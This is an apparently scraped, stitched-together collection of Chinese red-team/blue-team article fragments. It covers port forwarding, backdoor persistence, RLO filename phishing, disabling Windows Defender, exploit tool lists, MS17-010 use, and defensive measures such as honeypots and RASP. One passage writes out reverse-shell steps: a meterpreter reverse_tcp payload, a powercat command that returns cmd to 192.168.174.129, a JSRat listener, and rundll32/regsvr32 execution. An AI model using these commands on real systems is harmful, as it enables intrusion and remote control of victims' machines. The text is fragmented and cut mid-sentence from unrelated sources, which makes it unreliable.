p1为监听的端口,p2为转发到的端口。 ./portmap -m 2 -p1 9999 -p2 33889 成功监听到转发出的3389端口。 设置socket5 0x04.2.4 NPS优点 1.可使用多个ket多个客户端 2.使用web界面较为简单,适合刚刚进入内网 3.有简单的流量加密 0x04.2.5 NPS使用 配置客户端 添加
第二季 这次继续围绕第一篇,第一季关于后门: 《APT对抗(一) 红蓝对抗关于后门对抗》做整理与补充。再深入一步细化demo notepad++。 作为攻击者,要首先考虑到对抗成本,什么样的对抗成本。影响或阻碍对手方的核心利益。把概念加入到后门,更隐蔽,更长久。 文章的标题既然为APT对抗(二) 红蓝对抗关于后门对抗,那么文章的本质只做技术研究,Demo本身不具备攻击或者持续控制权限功能。 使用notepad++(demo2).exe 打开以php结尾的demo.php,来触发microdoor。并且生成了micropoor.txt ? ? 而micropoor.txt内容: ?
第三方后门: 如apache,serv-u,第三方软件后门 第三方扩展后门: 如php扩展后门,apache扩展后门,第三方扩展后门 人为化后门: 一般指被动后门,由人为引起触发导致激活,或者传播 2. 攻击者与防御者的本质对抗是什么? 增加对方在对抗中的时间成本,人力成本。 这里要引用百度对APT的解释: APT是指高级持续性威胁。 做为攻击者的对抗,无开放端口,无残留文件,无进程,无服务。在防御者处理完攻击事件后的一定时间内,再次激活。 5.后门的生成 大体分为四类: 1.有目标源码 2.无目标源码 3.无目标源码,有目标api 4.无目标源码,无api,得到相关漏洞等待触发 结合后门生成分类来举例细说几个demo。 5.3 无目标源码,有目标api 目前大多数的Ms_server,内置iis,从windows2000开始,而目前国内市场使用03sp2,08r2为主。
文|腾讯蓝军 jumbo 红蓝对抗越加普遍及重要,甚至成为了大型赛事,随之⽽来的是防守方大量部署安全设备,如FW、WAF、IDS、IPS等,想要从Web端深⼊到对⽅内⽹已经困难重重。 但是,⼈永远是最⼤的弱点,在日渐增多的防护设备⾯前,钓⻥攻击(Phishing)已经成为对抗中⼀种必不可少且非常有效的攻击⼿法(近期也见到实际攻击中针对HR的邮件钓鱼攻击),一旦有人中招,攻击队就直接能进 ,来达到⽂件名反转的效果, 如下图就是⼀个插⼊Rlo字符后的⽂件名,看后缀是个txt: 但是看⽂件详情⼜是个scr⽂件: 下图展示了打开⼀个看似是png图⽚后缀的⽂件,却执⾏了notepad: 2. 我们讨论下,为什么简历投递钓鱼在腾讯蓝军的远程办公安全演习、其他红蓝对抗项目中效果出类拔萃呢? 我觉得有如下几点: 1、首先,我们的邮箱从哪里来,邮箱收集可以从领英、v2ex、搜索引擎等渠道获取,那为什么会在上述地方出现邮箱地址?
权限和system权限无法关闭 Windows defender 注意:以下工具和技巧皆需要Administratior权限才能成功使用 NSudoLG 工具地址:https://github.com/M2Team
,rw,hidepid=2 /proc 该工具就什么输出都不会有,或者只有问号: 这里我们使用pspy作为辅助演示(当没设置hidepid时)。 0xf0) >> 2):4] = 0x504f5354' 5.2 网站文件 除了使用抓包工具去进行敏感信息的抓取,我们还可以在网站本身去做一下手脚。 腾讯蓝军也会持续和大家分享更多攻防知识,希望能够和大家共同成长,提高整体红蓝对抗水平。 文中涉及的技术信息,只限用于技术交流,切勿用于非法用途。欢迎探讨交流,行文仓促,不足之处,敬请不吝批评指正。 【附录】 附录1 红蓝对抗之windows内网渗透 附录2 pspy: https://github.com/DominicBreuker/pspy 附录3 bash: https://Linux.die.net /man/1/bash 附录4 setuid: https://man7.org/linux/man-pages/man2/setuid.2.html 附录5 创建特权容器: https://github.com
如果你想看关于Red Team的秘密 请继续往下翻哦 Red Team首次公开部分红蓝对抗框架 公开内容共分14个模块 准备钓鱼攻击 发送钓鱼邮件 发送payload 运行payload命令 维持本地持久化 获取命令&控制通道 升级本地权限 执行本地侦查/发现 执行网络侦察/发现 进行横向渗透 升级域权限 查找和访问敏感数据 泄露敏感数据 在没有C2的情况下维持远程访问 01 准备钓鱼攻击(从公开资源) 常见的蓝队侦查和预防控制 ? 02 发送钓鱼邮件(到目标组织员工邮箱地址) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 11 升级域权限(通过常见的载体) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 日志记录/SIEM(安全信息和事件管理)/警报 14 无C2的情况维护远程访问(使用通用接口) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? ?
windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1 Step 2: set LPORT 4444 set ExitOnSession false exploit -j -z Step 3:使用python启动一个简易的Web服务器用于托管shell.exe python2 /powercat/master/powercat.ps1'); powercat -c 192.168.174.129 -p 6666 -e cmd" -f msi > evil.msi Step 2: /JSRat.py -i 192.168.174.129 -p 5678 Step 2:访问client comand连接客户端执行命令 Step 3:将上述命令复制到目标主机上执行 rundll32. /JSRat.py -i 192.168.174.129 -p 5678 Step 2:访问client comand连接客户端执行命令 Step 3:将上述命令复制到目标主机上执行 regsvr32.
github.com/1in9e/gosint 分布式资产信息收集和漏洞扫描平台 ApolloScanner https://github.com/b0bac/ApolloScanner 自动化巡航扫描框架(可用于红队打点评估 burpFakeIP burpFakeIP 自动发送请求 https://github.com/nccgroup/AutoRepeater AutoRepeater Hack-Tools 适用于红队的浏览器扩展插件 /STS2G STS2G Struts2-Scan Struts2全漏洞扫描利用工具 https://github.com/HatBoy/Struts2-Scan Struts2-Scan spring github.com/Summer177/seeyon_exp seeyon_exp 通达OA综合利用工具 https://github.com/xinyu2428/TDOA_RCE TDOA_RCE 蓝凌 dns2tcp 是一个DNS隧道工具 https://github.com/iagox86/dnscat2 dnscat2 内网渗透代理、端口转发工具 http://rootkiter.com/Termite
视频内容 红蓝对抗之域渗透技巧 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。 如有需要查看超清1080P版视频,可以选用以下2种方式进行查看。
一、什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 通过周期性的红蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(红队)代表攻击方,Blue Team(蓝队)代表防守方。 在本文中,笔者将挑选其中较为通用且容易在红蓝对抗中实施的近源渗透技术进行探讨。 可以预见,越来越多的公司和团队会希望红蓝对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。 参考资料 • 柴坤哲、杨芸菲、王永涛、杨卿,《黑客大揭秘:近源渗透测试》,https://www.ituring.com.cn/book/2770 • lake2,《网络空间安全时代的红蓝对抗建设》,https
红蓝对抗之Windows内网渗透 作者 jumbo@腾讯蓝军 前言 无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。 而国内外红蓝对抗服务和开源攻击工具大多数以攻击Windows域为主,主要原因是域控拥有上帝能力,可以控制域内所有员工电脑,进而利用员工的合法权限获取目标权限和数据,达成渗透目的。 2、将十六进制格式的密码进行Unicode编码。 同时预告一下,也算是立个flag:为了让红蓝对抗不用过于依靠个人经验和能力以及提升对抗效率,腾讯蓝军的红蓝对抗自动化工具平台正在筹建中,希望投入实战后有机会再跟大家一起交流学习。 Kerbrute: https://github.com/ropnop/kerbrute Responder: https://github.com/lgandx/Responder 相关阅读: 网络空间安全时代的红蓝对抗建设
2、异构边界防护设备 (增加入侵难度和成本) vpn和防火墙采用异构方式部署,同时在内外层vpn系统网络区域间部署大量蜜罐。 0信任安全网关 4.连环陷阱的apt攻击捕获战法 基于主动防御理念,利用 动态伪装和反向水坑,对抗0day高级攻击者。 2、配置虚拟进 完成本机的诱捕陷阱后,需要对虚拟机周围形成联动的诱捕体系,以防止攻击者绕过本机陷阱,直接对网络可达的其他主机进行渗透。可通过配置虚拟进程,模仿真实的高危服务,与真实业务共同对外发布。 5.零信任架构,保障vpn始终在线 可实现几个关键目标 1、vpn始终在线 2、安全防御足够,有效切断攻击方的攻击链条 3、运行过程灵活自动,避免运维人力大量投入。 2、基于时间维度分析 将演练前3个月至半年的访问数据进行提取,与演练开始后的数据进行对比,通过对比有效发现新增ip情况,新增部分往往包含演习攻击者ip。
一款CS后渗透模块插件,让大家使用一款插件就够了,本插件集大家之所长(其实就是重复造轮子了),本插件后期也会持续更新,欢迎各位老师关注!
01 什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 通过周期性的红蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(红队)代表攻击方,Blue Team(蓝队)代表防守方。 在本文中,笔者将挑选其中较为通用且容易在红蓝对抗中实施的近源渗透技术进行探讨。 可以预见,越来越多的公司和团队会希望红蓝对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。 参考资料 柴坤哲、杨芸菲、王永涛、杨卿,《黑客大揭秘:近源渗透测试》,https://www.ituring.com.cn/book/2770 lake2,《网络空间安全时代的红蓝对抗建设》,https
在红蓝对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。 db2_version #探测内网的db2服务,基于默认的50000端口 auxiliary/scanner/netbios/nbname #探测内网主机的 MS17-010 永恒之蓝在内网渗透中是屡试不爽的,基本上一打一大片。 但是MS17-010在实际红蓝对抗渗透中(通过代理打内网)并不好利用,MSF中自带的模块要打很多次才能成功一次,而且MSF自带的模块打sever2003的机器很容器蓝屏。 所以在真实红蓝对抗中不建议使用该漏洞,除非有百分百的把握能打成功 ? ? ?
2、返回包状态码为200,返回内容必定是16位的密钥 ? 更多细节,请参考《OpenRASP 最佳实践》[2] ? 2、RASP 技术和现有方案主要区别 首先,RASP 几乎没有误报情况。边界设备基于请求特征检测攻击,通常无法得知攻击是否成功。 最后,RASP 可以对抗未知漏洞。发生攻击时,边界防护设备无法掌握应用下一步的动向。RASP 技术可以识别出异常的程序逻辑,比如反序列化漏洞导致的命令执行,因此可以对抗未知漏洞。 (2)Linux audit日志检测 虽然冰蝎通讯流量是加密的,但落到主机侧,还是会调用系统命令,所以可以在主机审计日志层面定制检测规则,监控冰蝎对系统命令的调用。 0x04 总结 随着攻防对抗的不断升级,攻击方的手段越来越隐蔽,很多攻击流量都会进行加密,给防守方带来了较大挑战,相信后续对加密攻击流量检测的研究也会越来越多。
谨以此文讨论一下在红蓝对抗场景下几个关键的技术点的二三事 ? 内网里常见的漏洞利用比如MS17-010、MS08-067、RDP爆破、SMB暴力破解、数据库爆破、S2漏洞利用、weblogic RCE系列等方式都是不错的选择,由于甲方对内网安全重视度不够往往内网服务器 系统进程的利用也是较为不错的方法常见的如powershell、SSH流量转发等方法,上次更新的kali2的时候偶然间发现kali2都集成了nishang、Powersploit等框架。 ? 0x07攻防对抗 攻防对抗的场景下和传统的僵尸网络、木马、蠕虫病毒类的检测方法有相当大的差异性,主要表现在传统的恶意程序更多的趋向于自动化攻击,其攻击特点表现在比较固定利用的漏洞、EXP都相差无几且特征比较明显 安全对抗的表面是攻击技术与检测防御的技术演进,本质是人与人之间的投入、技术的博弈。
红蓝对抗是最近很火的一个词,也是非常多小伙伴想要学习的技术方向,那么什么是红蓝对抗,如何学习? 其实很好理解,就是通过攻防的方式来检验企业是否安全,通过对抗的方式来找出安全的弱点,针对弱点进行防御建设,通过不断优化这个流程,让企业的安全状况越来越好。 这篇文章主要以老外整理的框架 ATT&CK 来看,我们如何学习红蓝对抗的技术,怎么提升自身的技术能力,更好的提升整体的安全能力。 绕过防御 随着安全行业的发展,越来越多的安全公司和安全产品被很多公司所使用,在对抗过程中会遇到非常多各式各样的安全产品,如何绕过防御就成了攻击方难以逾越的门槛,对抗无止境,没有百分之百安全的系统,也没有百分之百可以防御的安全产品 从学习技术的角度,按照 ATT&CK 的框架来学习攻击技术一定是可以的,但不一定在实际的攻防对抗中全部用到,可以优先选择最有效的技术点来学习,然后在实际的对抗中,遇到常规技术无法继续的时候,可以再去有针对性的学习其他的技术
MS08067红队攻防从第二期班开始增加了“实战对抗”环节,为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境,将同学分为AB两队,一攻一守,实现既有攻击也要有防御更要有反制的全面内容实战。 以下为第3期实战对抗报告: